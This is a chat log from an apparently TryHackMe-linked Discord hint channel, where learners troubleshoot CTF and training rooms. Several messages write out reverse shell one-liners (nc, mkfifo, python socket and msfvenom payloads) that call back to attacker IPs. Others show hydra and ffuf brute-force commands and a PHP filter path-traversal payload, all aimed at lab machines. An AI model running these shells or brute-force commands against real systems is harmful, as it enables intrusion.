#room-hints

I think.

Or if it has a valid shell path

I've used that in the past for THM questions that wanted to know how many users a machine had.

There's multiple shells, not just /bin/bash.

As long as it isn't like /dev/null

Can't view imgur pages at work

Just drop it in here

You can escape the colon with . But it's fine.

with \

Yeah, so /nologin, /sync, /games, paths like that mean those users don't have a shell, so probably aren't "user" accounts.

I only see a root user

Oh I think I remember that. What room is this?

Which task

The second question?

So, based on /etc/passwd, how many users are there other than root with a valid shell?

Try it.

I don't remember how I figured out the answer to the next question, but it's the standard user that web servers run as.

Gave +1 Rep to @versed leaf

Oh there.

No problem.

Oh, I forgot you could send commands in.

Sweet.

Hint: the questions always tells you the format that it expects an answer in, and the number of asterisks equals the number of characters in the answer. When I'm confused, I use that to kinda clue me in. So for that question it would've said Answer format: ******** which would've told you it was looking for an account with 8 characters in it.

Especially helpful since it shows you slashes and periods and most other punctuation.

lol no worries. Learning has occurred

Hiii

I ran into a pinch in the file upload room of the web fundamentals room

So you see I've been able to connect the webs in the task till it got to java.uploadvulns.thm
It'll go on my normal browser but it won't go on burp or zap

Keeps rejecting connection

did you set up the proxy properly?

Hi All, Need some help in the below room. I am stuck on Task 25 I am unable to get the attackbox or my own Kali VM to run jwt-cracker. Any tips please? https://tryhackme.com/room/zthobscurewebvulns

Yep I did, Regular proxy settings

Apt install npm
npm install --global jwt-cracker```

jwt-crawker <token> [alphabet] [maxlength]

Do I do an example so you'll copy paste the code ?

Thanks I will try that 🙂

@ripe hedge here's what it says *sorry for pinging you

are those both running on the same VM?

like why is the theme different?

On the same machine

I'm running Linux as an OS

One is burpsuite's chrome the other is Firefox with no proxy

thanks it worked 🙂

Gave +1 Rep to @west harbor

You're welcome

Help guys
Pls any one

If it's going through the burp proxy it won't work but with proxy off it will(I forward the intercept) also if I use burp I'm browser it doesn't work

Solved it meanwhile ?

Still haven't

I've read the room over and I don't see anything wrong

Show me the output of cat /etc/hosts pls

3 hours plus now and I'm stuck xD

First of all, please use screenshots instead of photos, that's a pain to check. 🙂 Then get rid of all the duplicates in the file.

Okay a minute

Is this okay

Okay?

If it's the correct target machine IP then it should be, yes

The target machine is correct

So is it working with Burp now or still not ?

Yep it's working

Thank you so much

I guess it was the files that were much

Anyone able to spare a hint on Osiris? I managed to gain the foothold and first flag. Using enum scripts, I think I found the next step, but am unable to retrieve/decrypt the information. I also retrieved the necessary key and file for "offline decryption", but the according tool always crashes, when performing the decryption.
To not spoil the fun/hunt for everyone else, I can share more information via DM.

:@ i spend 3 days working on "Jeff" stuck on the FTP server. Wondering if I missed a hint somewhere about the next step. Don't think I would have ever made that connection on my own unless was able to find my own files zipped up on the webserver

Are you really just supposed to guess Jeff is running a script on your uploaded files?

doing lazyadmin. I found the sweetrice site, which isn't "open" yet. the site tells me to go to some dashboard. I looked at the documentation and also the github repository. Everywhere it just says "log in and go to the dashboard". I can't find any login forms though. No other ports are open either.

5 steps install SweetRice

1. Unzip the package and upload everything to website root directory[root dir].
2. Open http://yourdomain/[rootdir]/ in your browser,accept the GPL license and jump to install form.
3. Chmod directory inc,attachment,and root / permision to 755[if necessary]
4. Enter your website ,database and administrator information and submit form.
5. Login to dashboard and enjoy SweetRice.

apparently at least the first step has been done

nvm... found it.

I'm not sure if this belongs in #room-help or not, but I am being asked "What is the name of the other user account?". I believe I have put in every logical answer in every combination I can think of, and it is not accepting it. Any help on this matter would be appreciated

Need to know what room and task you're working.

Is it Conti? I think that question was in Conti.

Windows Fundamentals 1 task 6

Ah

I'm not sure what I can say in here about what I have tried

If you open local user manager (lusrmgr.msc) it can show you what users are on the computer.

Done that. I don't get any relevant info to the question

I get a message saying "This snapin may not be used...ect."

double clicking anything produces nothing as well

It lets you open it.

Right-click Start, hit Run, "lusrmgr.msc", expand Users

I can't

It doesn't let me

You sure you're on the right machine? I didn't have any issues opening it. Try restarting the box.

This is why IT and COFFEE go together. I left and came back to this. I've been trying to do this on my host. Sorry for wasting your time, but thank you for trying. I'm now booting up the VM

Gave +1 Rep to @versed leaf

No worries, glad you got it.

Can anyone give me a hint for Horizontall?

I see that there is a CVE for the version of SSH running, but it is returning that ALL user names I am passing to it are valid

Can you share a screenshot please?

Verify to send an image

!docs verify

!docs verify

In 'Common Linux PrivEsc', in Task 9, the last step doesn't seem to work for me: Now, run the "script" file again, you should be sent into a root bash prompt! (I don't think I changed the script file. Not sure how it will give me a root bash prompt).

Did you reset the PATH variable back to default already before doing the last step?

yes. am i supposed to run /usr/bin/script?

No, you are not supposed to restore the PATH variable before you finished all the steps. Otherwise it won't work. So it's crucial that you have /tmp in your PATH variable and your ls executable in that directory.

The script in the home directory will try to run ls. So when /tmp is not in the PATH variable it will use the default ls binary located in /usr/bin or /bin . But if you have /tmp in the PATH variable it will use your custom ls binary and therefore spawn a root shell.

My custom 'ls' is running /bin/bash - is that supposed to give a root shell

Yes, but it has to be done through the script file in the user5 home directory because that file has the SUID bit set.

Otherwise it will just spawn a shell as the user you are already logged in with and therefore you won't even notice anything.

I'll take another look and get back. Thanks

Gave +1 Rep to @left thunder

Ye, not a problem, might be a bit confusing at first, dunno how to explain it in a different way ^^

was the intent of task 7 to base64 encode the flag? https://tryhackme.com/room/linprivesc

I checked again. I don't think the instructions talk about replacing the script file. I tried chanigng suid for the ls in /tmp, but that didn't work. Will take another look later

Is there's an alternative to https://scylla.sh/ ?

Ye, you are not supposed to replace the script file. All you have to do is executing that script file. And giving your ls executable SUID will also not change anything as it will not be run with root privileges due to the file owner is the one you are logged in with.

Hi, any body did the room https://tryhackme.com/room/res?

whether it is possible to privesc to root? (even without it i can still answer all the question)

?

i did it a while ago. base64 to get privilege escalation by reading important files

hey doodz..room:authentication bypass

i have enumerated the list of names. i put them on a .txt

feed them into the cut and paste

ffuf -w newnamelist.txt:W1,/usr/share/wordlists/SecLists-master/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.140.65/customers/login -fc 200

it runs through the names and nothing happens.

i've tried changing the spacing, changing flags, changing '200' , even though that would be the indicator , changing wordlists (rockyou, etc) as well as reenumerating incase i missed a name

need halp!

So you have no status codes, size whatsoever in that file except the usernames?

https://tryhackme.com/room/johntheripper0
task 7
I basically want to know if i am going at this right, my hash file should be Joker:7bf6d9bb82bed1302f331fc6b816aada
and the command I run should be john --single --format=raw-sha256 hash7.txt

I was trying to use the wrong format

Can someone point me in the right direction on this server-side filter enumeration? I'm trying to use the intruder module in burp suite to enumerate what file extensions are allowed but don't seem to get any hits. Some of the write-ups I've come across reference a specific extension but that doesn't seem to work in my case.

https://tryhackme.com/room/uploadvulns

Ugh, nevermind. There must have been something up with the webserver. Once I reloaded it it's working as expected.

Yea, that's weird. When I would try to upload a file the 'submit' parameter in the URL was returned as 'failure' rather than 'invalid' like I'm seeing now.

correct. i didnt think the size parameter mattered in this enumeration because it was being filtered by the -fc flag ?

No I was talking about the valid usernames file. So is there anything else in it besides the usernames?

oh. no just the usernames

Did you edit the output file of ffuf for that usernames list?

Or you created everything manually ?

created it manually

Also the empty file itself, right ?

yes

i touched it

should i attempt to make the original enumeration of names > into a file then run it ?

No, if a manually created file doesn't work then the file ffuf will create won't work either

Can I have the IP of the target machine so I can try it myself real quick ?

10.10.171.89

Btw, are you on your own machine or the attackbox ?

my own VM

What version of ffuf you are using ?

1.3.1

Is it just a naming thing or why is your SecLists folder called SecLists-master ?

its just the seclist i downloaded

i think it was the suggested link in one of the rooms actually

that's the only thing i've had to change from the normal cut and paste commands like that

maybe i'll try for the attackbox

Okay, could you try it like that? ffuf -w newnamelist.txt:W1 -w /usr/share/wordlists/SecLists-master/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.171.89/customers/login -fc 200

same result

im going to try the attackbox

Ye, I guess on the attackbox it will work, as it was working for me as well

i wonder what the issue is

Maybe try that as well #junior-pentester-path message

thanks !

yeah i got it working

also it wouldn't take names redirected into a file, i had to manually do it . super odd but ffuf looks really usefull. i should get better with it

@amber sail did you get it working?

no

Where are you finding the IP you're scanning?

on the vpn tryhackme provides

Where though?

Physically where on tryhackme are you seeing it?

well i looked in ifconfig and on https://tryhackme.com/access

That's the IP for your own box, not the target

where it tells you if youre connected

thats what its telling me to check

That's an assumption on your part.
Why do you think it's saying that? I can assure you that it is not.

it says to do "
Scan this box: nmap -sV <machines ip>" and right before it it tells me to open up the vpn

i wish i could send screenshots

it doesnt give me a IP to check

!docs verify

just to check machines ip

It means the target machine

NOT your machine.

Click the Start Machine button in Task 1

ohhh

Use the IP displayed under Active Machine Information

Do this if you want to be able to send images

okay machine is starting rn

I'm having trouble finding the HTTPS:// certificate issuer in the Encryption/Cryptography module. I'm using Safari.

It's Task 8

okay its working now thank you so much

Gave +1 Rep to @stuck fractal

okay now im having trouble again it says to scan with -p-400 and it scanned 4 ports but the question keeps saying it s wrong

thasts 4 ports right

No

That's 4 ports that it found open

open

It checked more than 4

oh*

so 369

396*

You'll need to do a bit of maths.

lmao my bad i need to drink some water im dehydrated

oh duh i was thinking that since it found those ports open it wasnt scanning em

im a little slow today

Also, you need to use a switch that enables versioning/fingerprinting of the discovered services.

There's several available that'll do it.

will need to, not quite yet

Always best to avoid rushing ahead

TCP is what it didnt resolve right

No

They're TCP ports

Have you done the nmap room?

yeah i have im just really bad at remembering where to look for each flag with for certain info

usually when its not resolved nmap tells me

but nothing on there is saying not resolved

and im really tired so i think i should take a break before i do this\

i havent gone to sleep in 2 days

yeah ima go take a nap

thanks for helping me hopefully i can figure it out after my rest

Notes 🙂

Take notes!

Hey everyone, on the Pre Security, How Websites Work, Task 1, I'm having trouble inputting the answer. I keep getting "incorrect answer" but Idk what's going on. I've typed the answer different ways but I'm still getting incorrect answer. Can someone help me with this please lol? it's frustrating

the DNS one?

Scratch that, I see the specific "how websites work" task... did you look at the asterisks? they give a hint

What answers have you tried so far?

..nevermind just checked the other channel

Hey everyone. I am trying the goldeneye guided CTF and I am at the point where I am supposed to get a reverse shell by editing the path to the ASpell location.

So far I have tried

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <myIP> 4444 >/tmp/f

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<my_Ip>",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<myIP>",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

sh -c '(nc -e /bin/bash <myip> 4444)'

and

sh -c '(python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<myIP>",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")')'

and then tryed to trigger it by going to my profile > blogs > Add a new entry >> activate spell Check

None of the above seems to work and I feel like it should... Can anyone give me a pointer?

I am kind of stuck on "Smag Grotto" and I am not sure where to go from here.
More specifically, I got a shell as www-data and need to elevate to use Jake to grab user.txt.

||I found the cron job that adds a public key file to "authorized keys".. and I can write to this file. Idea is to create my own pair of keys, replace Jake's public key with mine and wait for the cron job to run. Then I can ssh as Jake using the private key. However, I keep getting prompted for a password each time.||

Instead of replacing Jake's keys with yours, are you able to grab Jake's keys and use them instead?

I have his public key but not his private one. So yea I can’t use those.

If you get a shell as www-data, are you able to access Jake's directory? If so, should be trivial to grab his private key.

Www-data doesn’t have access to Jake’s stuff. The public key I found is inside /var/.back/keys-pub.backup and I learned I can modify it.
I think it’s the way I’m formatting the key when I replace the existing content. I will experiment with this a little more once I’m get home.

For task 11 of the OWASP room, does anyone know what webapp they are talking about? Are they talking about the web app(http://10.10.63.253:8888 ) from task 7 ?

From task 8

"Well, we can download it and query it on our own machine, with full access to everything in the database. Sensitive Data Exposure indeed"

Do I download it from the browser or command line?

when I do "ls -l" it doesn't show any databases

when I cd into the Downloads folders, it shows no downloaded databases

What task is that from?

OWASP room, Task 8

I am sorry, task 9

Oh it's just saying that for flat file databases, if not secured, you could potentially download the whole database and query it at your own leisure.

Keep following the task and it'll walk you through it.

do I need to anything on my terminal to find the answers or do I just need to read through the manual

The task will walk you through what you need to do. Mostly.

Okay , why can't I connect to my target machines IP in a web browser

everytime I try to connect, I get an unable to connect message

How are you connecting - through a VM or using a THM-hosted attackbox?

THM-hostattack box

Can you post a screenshot of your error?

I actually fixed it. I was typing "http://MACHINE_IP" when I should have just been typing "MACHINE_IP"

they don't allow me to post screenshots in here

To post screenshots, you would need to verify your THM account with the discord bot

!docs verify

Has anyone recently attempted Kiba?
I found the ||prototype poisoning|| vulnerability and I found a python script that can exploit it but I keep getting this:

Exploit through the Dashboard (Timelion and Canvas) is also not working.

Anyone completed the Windows Forensics 1 room? I'm having trouble on the hands-on challenge specifically with finding the last time the USB was connected.

need hint on overpass3

i am on paradox uuser

For future references how would I do that?

Follow the instructions in the link
!docs verify

!docs verify

https://tryhackme.com/room/passwordattacks
||hydra -l phillips -P clinic.lst 10.10.143.247 http-get-form "/login-get/index.php:username=^USER^&password=^PASS^:F=Login failed!"||
task 8 question 3

what i do wrong? wny hints?

Answered you in #subs-room-help

Hi! I'm having a problem with the machine's IP we are supposed to attack in rooms NMAP & NETWORK SERVICES. I need the IP to answer the questions, but I don't know what it is. Where can I find that IP?

look for the tasks that have a green thing on the right, those you can start the box that is your target

@crisp forum Are you saying that the IP address on top of the page is the machine we have to attack? I thought this IP belongs to the machine that I am using.

@crisp forum @timid hollow Thanks, folks. I finally understand.😋

Gave +1 Rep to @crisp forum

The target machine IP can be found in a box like that:

Ah, nvm if you already figured it out then ^^

@left thunder Yes. But thanks anyway.

Shaker is really perplexing... I have so many threads but I don't know how to pull them... lol

JACKPOT!

bwahahaha

Hi there, I need some help pls. What is wrong? Room Linux PrivEsc

did you figure it out, I'm guessing you are using the attackbox?

yes, attackbox

so looking at the room and your script, the room doesn't have line 2&3 in the backup.sh script

actually nevermind, I see they are using antivirus.sh vs backup.sh

but both should work, I'm trying it through attackbox

is this the room you are doing? https://tryhackme.com/room/linprivesc

there are 2 or 3 priv esc rooms, the other one didn't look like yours I thought but I think I might've chose the wrong room

Solved it meanwhile ?

If it is the one I linked above, it wasn't working for me either, but then I checked the permissions of the backup.sh script and it wasn't marked as executable, once I did that, it worked (I did this room previously but a long time ago)

I will try, thank you

Thats way more then a hint 😄

it work's. thank you

Linux PrivEsc (NFS Priv Escalation) walk-through room / TASK 11

I am having trouble getting a shell after mounting the folder to my attack machine and creating a file per the instructions. Not sure where to take it from here.

Can someone throw me a bone?

I think the goal is running nfs (has SUID set)

But how

I think I figured it out. There was another shared directory that had “no_root_squash” and I could access. Had to mount that instead and create my file there.

room network services, I have both the rsa private and .pub key, now how do I use them to login to ssh?

Solved it meanwhile ?

Yup

Now I am stuck in the pwning telnet

And what's the issue ?

How to drop the msfvenom script in skidy's backside

Just copy paste ?

didn't work right for some reason

What have you copied ?

msfvenom -p cmd/unix/reverse_netcat lhost=10.10.166.80 lport=4444 R

That's what you paste into the telnet session ?

Yeah, I think I did it wong

msfvenom is a hacking tool that will create payloads for you. So you have to run that command on your attacking machine and then copy and paste the output you received from msfvenom

yeah, had to start over due to causing a ping flood

Don't forget the -c 1 😄

kek

Where does the file drop out of term into?

tried looking in tmp

ahhh raw payload in term

Ye, it will print the payload right in the terminal

I did the payload but nothing is coming in on netcaty

mkfifo /tmp/tqbz; nc 10.10.166.80 4444 0</tmp/tqbz | /bin/sh >/tmp/tqbz 2>&1; rm /tmp/tqbz ?

That's the full command you used in the telnet session ?

yah

oh .run

derp

Right

If it's still not working with run now you might messed up the machine and have to restart it, but lets see

I got the 'connection rec' message but none of my commands print out in netcat

What you mean, so if you enter whoami you are not getting a reply ?

nopr

oooo other term window

so complex

At first, but you get easily used to it 🙂

so many windows to manage

nmap -vv -A 10.10.121.53 > portz.txt

rapid scan of all ports to file?

You haven't specified to scan all ports. And using -A is barely necessary and an overkill, especially for an initial scan on all ports, although they might have suggested to use that in the task itself

nah, I assumed -A was quick and durty

Check nmap -h if you unsure what a flag is doing. But it's rather slow and aggressive.

ah

Having a lot of fun at these puzzles. More interesting than games rn

what is it not resolving

What room you need help?

vulnuniversity

pen testing

use nmap -sV -A -p- <ip>

ahhh i see

but it doesnt say its not resolving anything

like it usually does

if something doesnt get resolved it usually says "did not resolve..."

i tried that it doesnt show me the hostname

i dont think it does

nah

If you see the hint and make some research

or you can use man nmap

then look on -n

oh yeah i forgot about man

thank you!

You're welcome 😄

Not sure if simply giving out answers is a good approach, especially in the room hints channel. Just saying 🙂

Oh sorry about that 😄

But he know the way to find that answer

I'm not a mod or something, so all good, just wanted to let you know my opinion on it. :=)

I delete it 🙂

what url am i supposed to be using

it doesnt give me one

the URL of the machine

that you deploy

Look at the gobuster syntax

i did that and i got this

use the wordlist on dirbuster 🙂

Also, read the error message, it explains what's happening. You're telling it to scan https...., but it got an HTTP response from the server. Drop the s.

Hmmm maybe?

okay i did that but its still not giving me a upload form page directory

do i have to open dirbuster for that

yes

/usr/share/wordlist/dirbuster/

use the medium one

Or you can run dirbuster against it without any options and it'll use the default list.

okay now im getting somewhere using the medium word list

its giving me alot more dir

got it it was the last dir that showed up after 62k

Here is the location: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

i got it thank you!

Gave +1 Rep to @iron wigeon

Congrats!

Anyone completed the Windows Forensics 1 room? I'm having trouble on the hands-on challenge specifically with finding complete path from where the python 3.8.2 installer was run? I've already checked the ShumCache, AmCache, BAM.

Pls has anyone done ✅ with psycho break

<redacted link> Heyo. I was trying out Crocc Crew CTF, but when trying to impersonate as administrator to gain it's ticket, this happened...

not sure if my KRB5CCNAME is set correctly, if someone could help me out i'll be grateful. 😄

what?

network services room at SMB

solved it nvm

it s not about that

Hi, i have a problem with Network services, task 7: Exploiting Telnet (like most of us ). I run the msfvenom command on my terminal (attack box), start the netcat listener, then run the payload in the telnet session (i use another terminal on my machine). The listener starts, but when i paste and run the payload in the telnet session, i read only this in my terminal:

connection from ip-10-10-27-182.eu-west-1 .... 53274 received!

Tried so many times...

Did you try to enter a command after "connection received" ?

I don't know what to enter. The room doesn't say anything about that

For example whoami. But if you unfamiliar with linux I suggest doing the linux fundamental rooms 🙂

Huh? I couldn't read that message as you deleted it that fast 😄

Eh eh... because I tried a different thing and got the flag. I was in the reverse shell, but I wasn't aware of that. Sorry, but for a native Windows user I expected something more verbose from the reverse shell. Thanks @left thunder

Gave +1 Rep to @left thunder

In ohsint room, for the last question, I don't understand what I am trying to get the password to?

I think that password has no specific use, you just have to find it :=)

Alright, I managed to get the Administrator.ccache and fix KRB5CCNAME. and also gather the administrator lmhash, but evil-winrm won't login with it.

Guys, can I get some help with Overpass3?|| I have created a public and private key on my attacker machine with ssh-keygen and than copied the public key into authorized_keys inside /home/paradox/.ssh I keep getting "Permission denied (publickey,gssapi-keyex,gssapi-with-mic)" when trying to connect.||

you should have a password, but check the permissions on the .ssh and authorized_keys files/folders

Thanks, I'll take another look on the evening. If memory serves, I did set the file to 600 and folder to 700

it may not like your key type as well

Hi guys I was doing the DNS room, on the task 5 first question "What is the CNAME of shop.website.thm?" the console continue to return this "** server can't find .website.thm: NXDOMAIN", can someone help me?

like on the top i select the different records and the console return the answer

no its clear

oh ok but how do I know what kind of subdomain I need? isnt that what im looking for?

ok im dumb

yep now works lol, thank you didnt read the subdomain in the question🙃

I'm doing the nessus room and I got the version, but it is saying that I am wrong

bruh wat

why are there 2

Going through MR Robot now. Hint for key 2 says white colored font.. and I am kind of stuck.

Could something possibly be blending in with the background somewhere? 😉

Hi 🙋

working on file inclusion, any hints on flag3

task 8

Combination of filter bypass and request method

from what i have, it's as though the page is stripping characters and numbers. Am I missing something?

yeah I did, works with the other two common methods. Tried changing to the second method but the same thing happens. stripping of characters and numbers.

dev tools

yeah but keeps changing back to the initial method

maybe am doing it all wrong

Okay thanks.

Brainstorm room. Nmap showing only 3 open ports (-p- scan) and answer is wrong. What am I missing?

Maybe didn't gave the machine enough time to fully boot ?

been booted for 30mins

guess I'll restart the server

no difference

Well, I have not done that room so unfortunately I don't know, was just and idea on why it might only found 3 ports.

Isn't there 6?

6 open, anyway.

I'd try it again, however I'm doing Ra.

Hello, this may be a very stupid question but I can't figure out where to find the code for the first level of MLSC CTF 2022 (it's supposed to be on a discord server but I don't know which one it is and what I am supposed to be looking for). If anyone has played it, thanks!

Uhm, is this even a room on tryhackme ?

It is https://www.tryhackme.com/room/mlscctf2021

Mh, seems to be a private room, so I have no idea, maybe someone else can help you out with that.

Alright, I'll wait to see if someone knows

When I get a shell on a Windows target machine, how do I determine what shell it is? Sometimes ls does not work, sometimes I have to use powershell "(New-Object System.Net.WebClient).Downloadfile(...) instead of powershell -c "Invoke-WebRequest ... and sometimes certutil.exe -urlcache -f .... Is there a more deterministic way I can use to determine what to use?

it never told me how to send a file over a ip to see

can i just use the touch command with some flag and send it to an ip

Are you on the website yet?

just upload a file...

on the webserver of the machine

no i gotta send it from a different machine

yeah, that is your kali/attacker machine.

and just by looking at the format of the answer you should be able to guess the answer

try answering it, and if you don't get it do, the other rooms/start learning before you jump into CTF's

so i went to the website but it just shows this

I don't remember vulnversity is there a http server for it?

oh nvm i got it, it wasnt taking the last bit of the url when i clicked open link

just had to copy it myself

but i cant seem to figure out what file type because i dont have any files on my machine

You can just create a file with the touch command

Then change the extension to whatever you see fit

Hey

Am doing the html injection tutorial but when I try to view the source code I can't find the particular codes am looking for

What's the room name? There is no room called "html injection"

It's under how the website works I think

Brb

So what code are you looking for in the source code? As you only have to inject html code in the "What's your name" input field, which is then going to display a malicious link on that webpage.

i cant find the input field

Did you press the green "View site" button in task 5 ?

yea the website opened

umm

am supposed to inject it through the source code right?

So that's the site you see, right ?

No, through the input field, which is "normally" supposed to enter your name, but as this input field has no input sanitation, you can inject html code through it.

oh

ok brb

？？？？？？？？？？

for the nmap room im having trouble on the question "How would you activate all of the scripts in the "vuln" category?" and how to scan for all ports

https://linux.die.net/man/1/nmap

https://nmap.org/book/man.html

im checking that on my kali machine

Read task 11 again 🙂

wdym task 11?

You said you are doing the nmap room, right? https://tryhackme.com/room/furthernmap

ya nmap switches

oh zamn

nvm i thought you were talking about something else

Hey folks! I'm doing File Inclusion on the Jr. Pentester path, and I can't seem to find a flag for the first challenge! Anyone got any hints for me?

yes

ty

omfg there's a hint haha

I've done some traversal stuff, tried some payloads with BS

okay yeah I've been changing that to POST

let me check some things

omfg

so I changed the source and then submitted. What is the difference between that, and me using BurpSuite>Intercept>Repeater/Intruder for doing the same?

hm

maybe i just did something wrong in BS

okay

so there seems to be a .js file that somehow stops that from being grabbed properly if I do it in BS. Thank you, @burnt rivet

Gave +1 Rep to @burnt rivet

What settings do I have to change in the Burp Suite tool to get the error on the left when going to the Google.com

Where am I suppose to look for the capture data when I perform this task

You see the little button on your burpsuite called open browser

That one

i cant figure out what filetype this is

ive tried every file type i know about

@lofty girder sorry for the ping

is there any hint or anything you can give me

nvm i figured it out

Something you could've done is research what type of file extensions reverse shells can have

Then see if any of those applied to the answer

hey folks! In Jr. Pentesting course and working on the SSRF room. Can I get another hint on Task 2?

Check what happens with the "Server Requesting" at the bottom when you change the parameter value

hmm i see it but can't seem to get the flag ID to the end of the URL like the challenge says

using &x=

Can I ask someone about Osiris? Thanks.

You can DM me if you’d like xD

Haven’t fully solved it yet though

So how is your url in the url bar looking like right now ?

just got it, thank you @left thunder !

Gave +1 Rep to @left thunder

took a lot of trial and error but I guess that's what the industry is about sometimes

Hey guys. Im stuck in cc: Pen testing room - the final exam (https://tryhackme.com/room/ccpentesting).
I found the hidden dir (secret) with Gobuster but there is nothing in it, how can I find the flags in here???

I tried using different extensions after /secret/ via Gobuster but still I didn't find anything that I can get access to it.

html, php, xml, txt, js, png, jpg

I used some wordlists in seclist like "common.txt"

Thanx!

I have been stuck on the room DNS in Detail for almost 2 weeks. No one can answer my question so far. The practical does not work no matter how exactly I follow the youtube video. At 13:30 the speaker says he's having an issue, the video cuts for a sec and the speaker comes back and says if your having issue to wait a few minutes and it will resolve itself. This is not working for me. I just want to speak to someone, a real person, who can walk me through what is going on, what is going wrong, etc. I am so frustrated I could cry and I only just started this whole thing.
Just how do you get help? What am I paying for with this website if I am just on my own????

@unborn spade

Hello everyone, any hint on nax machine?

I tried every enumeration step i could, still stuck

Any hints on what i shall focus on?

Thank you, i will go play around with that!😅

I managed to get the username and answer the third question. Now any hint for where to find the password?

hi

need a little nudge with https://tryhackme.com/room/easyctf

i gussed sqli for question 4

i havent done question 3 yet

and the hint for question for hints at password bruteforce

did you scan the system?

I did this one a long time ago, guess need to understand what steps you've done, did you scan or poke at it

lol finished that in like 2days lol

just last week

how long do you recommend staying stuck on a problem before peeking at the walkthrough?

it really depends, like did you exhaust all your ideas? and also depends what type of problem it is... I'd struggle for a few minutes, half hour what not on q&a

for a challenge system, maybe a day or even more

Like my stupid example is Hack Park where I got the foothold but could not get priv esc... so I left it for a week, came back, got priv esc in half an hour

i'm on the ignite room, and i got the user flag pretty quickly yesterday with some rce i found on exploit-db and then spent maybe 45 minutes looking around trying to find a vector for priv esc without any luck. then today i've spent about 40 minutes trying with sqlmap instead (also via exploit-db).

yeah it just really depends if you think you've exhausted your knowledge and have no other paths to explore or not

I haven't done that room, so I can't even give a hint but someone might've or you could search this room for one

i appreciate the meta-advice

perhaps i'll leave it for a bit and do another room or two, and then i'll try searching

ye

i nmapped it and got this `PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.41 seconds
`

Ok so you got 3 ports and you poked at them and found nothing?

ftp allows anonymous login but when i try to connect it times out

ssh is rarely vulnerable to any exploits

i assume its an sqli injection but the hint says a wordlist will help

Basically if you are struggling what to do here, you might want to go back and look at something like the web fundamentals path

How to enumerate websites and also what techniques to try

ive done a ffuf and a dirbuster scan

i just get errors

i found robots.txt but i assume thats useless

it does tell me there might be a CUPS server running but i dont know

Did you just go try poking at the website?

In your web browser?

ye

i did a bunch of dirbuster as well

i might try burpsuite

Maybe #holo-network ?

cool thanks man

Gave +1 Rep to @timid hollow

Or try browsing the site

it just a default apache page though

Did you do a nmap scan with -p-? So it could be a directory you haven’t found or a port (again I don’t remember this one well but based on what I did… I’d keep poking at web)

kk

thanks

Good luck

i got this with dirbuster ```Starting OWASP DirBuster 1.0-RC1
Starting dir/file list based brute forcing
Dir found: / - 200
Dir found: /icons/ - 403
ERROR: http://10.10.35.227:80/strona_7/ - ConnectTimeoutException The host did not accept the connection within timeout of 30000 ms

if you want more than hints, I'd try #room-help and see if someone can provide direct direction, I unfortunately need to step away

**Jr Pentester > Burp Suite — Task 7: Repeater
**
I am unable to interpret what they are asking here. I change the number at the end of the url to lengthy number but only get a 404. Should I try some code injection or something?

Try Integers not only whole numbers
If you get what I mean

hm okay

ty

NP

Did you check the hint ?

I'm sure I did

I have moved on for now lol

omfg no I actually didn't. @tulip mural and @left thunder thank you

Gave +1 Rep to @tulip mural

Ty @left thunder

got it

Hey, I have a problem on owasptop10 -> insecure deserialization - code execution
Even though I understand and follow the steps suggested to the letter I can not get a reverse shell through the cookie

P.S. Seems like merely rebooting the machine fixed the problem (no additional steps needed).

hey guys i need help on this question i cant find the name of the user

hey i am doing thm dogcat ctf, any hint what am i doing wrong?

and why the /etc/passwd file isn't opening

Can i Ping you about this

You could try ||../dog/../../../../../etc/passwd||, that %00dog seems to be causing an issue

without null character it is adding .php extension

Isn't there an ||ext|| GET param?

and adding them too is also giving error

Oh, haven't you tried to read the index.php file?

It will give you a way to bypass this file extension issue

hint: look into filters

it too is also giving error

Do you need .php%00?

You mentioned, it appends .php by itself

Also, as suggested by @flat juniper
Try to look into filters, as including the .php file will render it and not show its actual content

another error

filters to bypass file extension ??

Yeah, index.php is including itself again

To read .php file without rendering it

||php://filter/convert.base64-encode/resource=||

still somewhere i am making a mistake

wait wait i got it

finally done :))

dogcat is probably one of my favourite rooms @white salmon

well done (:

me too! finally found my 1st flag🥵

hi

I am in
Network Services room

Task 4

last one, now I have the key from id_rsa

and I changed the chmod 600

Download this file to your local machine, and change the permissions to "600" using "chmod 600 [file]".

Now, use the information you have already gathered to work out the username of the account. Then, use the service and key to log-in to the server.

What is the smb.txt flag?

this one what do they want us to do?

ssh cactus@$ip

load pubkey “/home/kali/.ssh/id_rsa”: invalid format: download/copy the public key into .ssh, or generate it with ssh-keygen -y -f id_rsa > id_rsa.pub\

what if I copy paste?

ssh into machine

oh nvm

this is to solve an error that can hsppen

wait what is this process

load pubkey is a command

?

i will throw invalid format error

you will have to either download/copy the public key into .ssh, or generate it with ssh-keygen -y -f id_rsa > id_rsa.pub

ooh, wait this is in the kali machine not the smb right?

yes

when I used the get command I did:

get id_rsa id_rsa_l

Should I replace

ssh-keygen -y -f id_rsa > id_rsa.pub

with

ssh-keygen -y -f id_rsa_l > id_rsa.pub

yes

wait I should get the .pub file too?

or is it a default file in linux?

after this step try to ssh to the machine

if it throws Load key “/home/kali/.ssh/id_rsa”: bad permissions then you may have to revisit the chmod step

understand now??

it didn't show this error

but what password should I use

